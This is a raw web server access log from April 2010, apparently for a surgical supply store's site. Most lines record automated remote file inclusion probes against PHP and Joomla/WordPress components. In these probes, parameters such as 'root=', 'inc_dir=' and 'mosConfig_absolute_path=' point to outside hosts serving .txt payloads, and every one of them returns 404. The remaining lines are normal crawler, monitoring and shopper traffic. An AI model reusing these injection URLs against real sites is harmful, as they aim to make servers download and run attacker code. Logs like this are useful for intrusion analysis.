64.15.158.246 - - [07/Apr/2010:05:15:48 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:15:48 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:15:48 -0400] "GET /logs//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:15:49 -0400] "GET //include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:15:49 -0400] "GET /logs//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:15:49 -0400] "GET /logs/access_log.Q109091100%20%20//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:15:49 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.249.65.182 - - [07/Apr/2010:05:15:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011AFD5955A17600AFBB05E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.98.23.9 - - [07/Apr/2010:05:16:15 -0400] "GET //mcf.php?content=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:16:15 -0400] "GET /logs//mcf.php?content=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:16:15 -0400] "GET /logs/error_log.Q109121500%20%20//mcf.php?content=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:16:22 -0400] "GET /logs/access_log.Q109121500%20%20//mcf.php?content=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:17:27 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:17:34 -0400] "GET /logs/access_log.Q109100200//modules/vwar/admin/admin.php?vwar_root=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:05:17:35 -0400] "GET /logs/access_log.Q109053000//modules/vwar/admin/admin.php?vwar_root=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:17:52 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:17:53 -0400] "GET //include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:17:53 -0400] "GET /logs//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:17:53 -0400] "GET /logs/access_log.Q109091100//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:17:53 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:17:59 -0400] "GET //include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:17:59 -0400] "GET /logs//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:17:59 -0400] "GET /logs/access_log.Q109091100//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:17:59 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:18:00 -0400] "GET //include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:18:00 -0400] "GET /logs//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:18:00 -0400] "GET /logs/access_log.Q109091100//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:05:18:00 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:18:27 -0400] "GET /logs/error_log.Q109081100%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:18:28 -0400] "GET /logs/access_log.Q109111500//modules/TotalCalendar/about.php?inc_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:18:31 -0400] "GET /logs/error_log.Q109081100%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:18:33 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:18:33 -0400] "GET /logs/error_log.Q110022600%20%20//mcf.php?content=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:18:36 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:18:47 -0400] "GET /logs/access_log.Q109111500//modules/TotalCalendar/about.php?inc_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:19:52 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:19:59 -0400] "GET /logs/access_log.Q110022400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:19:59 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:20:14 -0400] "GET /logs/error_log.Q109051500//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:20:14 -0400] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:20:15 -0400] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:20:44 -0400] "GET /logs/access_log.Q110030500/index.php?go=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:20:44 -0400] "GET /index.php?go=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:20:44 -0400] "GET /logs/index.php?go=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:21:03 -0400] "GET /logs/access_log.Q109122800%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:21:14 -0400] "GET /logs/error_log.Q109121500//mcf.php?content=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:21:20 -0400] "GET /logs/access_log.Q109121500//mcf.php?content=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:21:24 -0400] "GET /logs/access_log.Q109111500/index.php?go=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:05:22:08 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:05:22:08 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:05:22:08 -0400] "GET /logs/access_log.Q110032000%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:05:22:13 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:05:22:13 -0400] "GET /logs/access_log.Q110022400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:05:22:13 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:05:22:34 -0400] "GET /logs/access_log.Q109100600%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:05:22:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.217.216.132 - - [07/Apr/2010:05:23:10 -0400] "GET /logs/access_log.Q109122800%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:05:24:34 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:05:24:34 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:05:25:13 -0400] "GET /logs/access_log.Q109102300//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:25:26 -0400] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:25:26 -0400] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:25:26 -0400] "GET /logs/access_log.Q109061400%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:25:27 -0400] "GET /logs/access_log.Q110011600%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
203.19.4.18 - - [07/Apr/2010:05:25:52 -0400] "GET /logs/error_log.Q110010700//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
128.210.4.82 - - [07/Apr/2010:05:26:58 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:05:26:58 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:05:27:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011AFD5955813600ABBB05E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.216.43.133 - - [07/Apr/2010:05:27:41 -0400] "GET /logs/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:41 -0400] "GET /logs/access_log.Q109121500/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:41 -0400] "GET /index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:05:27:47 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:05:27:48 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:48 -0400] "GET /logs/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:48 -0400] "GET /logs/access_log.Q109121500/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:51 -0400] "GET /index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:58 -0400] "GET /index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:58 -0400] "GET /logs/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:58 -0400] "GET /logs/access_log.Q109121500%20%20/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:27:58 -0400] "GET /logs/access_log.Q110031800%20%20/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:28:07 -0400] "GET /index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:28:08 -0400] "GET /logs/access_log.Q109121500%20%20/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:28:08 -0400] "GET /logs/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:28:08 -0400] "GET /logs/access_log.Q110031800%20%20/index0.php?show=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:29:35 -0400] "GET /logs/access_log.Q110022400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
93.122.64.124 - - [07/Apr/2010:05:29:54 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:29:54 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:29:55 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:29:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
217.70.32.2 - - [07/Apr/2010:05:29:58 -0400] "GET //syntax_highlight.php?libpath=http://llall.interfree.it/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:05:29:58 -0400] "GET /logs//syntax_highlight.php?libpath=http://llall.interfree.it/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:05:30:02 -0400] "GET /logs/access_log.Q110030700//syntax_highlight.php?libpath=http://llall.interfree.it/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:05:30:04 -0400] "GET //syntax_highlight.php?libpath=http://llall.interfree.it/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:05:30:04 -0400] "GET /logs//syntax_highlight.php?libpath=http://llall.interfree.it/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:30:12 -0400] "GET /logs/access_log.Q110011600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:05:30:12 -0400] "GET /logs/access_log.Q110032100//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
93.122.64.124 - - [07/Apr/2010:05:30:09 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04 HTTP/1.0" 200 38021 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:19 -0400] "GET /images/head_aceLogo.gif HTTP/1.0" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:19 -0400] "GET /images/head_btn-shop.gif HTTP/1.0" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:19 -0400] "GET /images/head_btn-products.gif HTTP/1.0" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:19 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.0" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:19 -0400] "GET /images/head_btn-brochures.gif HTTP/1.0" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:20 -0400] "GET /images/head_btn-space1.gif HTTP/1.0" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:20 -0400] "GET /images/head_surgical-supply.gif HTTP/1.0" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:20 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.0" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:20 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.0" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:20 -0400] "GET /images/head_btn-seminars.gif HTTP/1.0" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:20 -0400] "GET /images/head_btn-conventions.gif HTTP/1.0" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:20 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.0" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:20 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.0" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:22 -0400] "GET /images/blend.jpg HTTP/1.0" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):05-060-04" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
93.122.64.124 - - [07/Apr/2010:05:30:23 -0400] "GET /favicon.ico HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
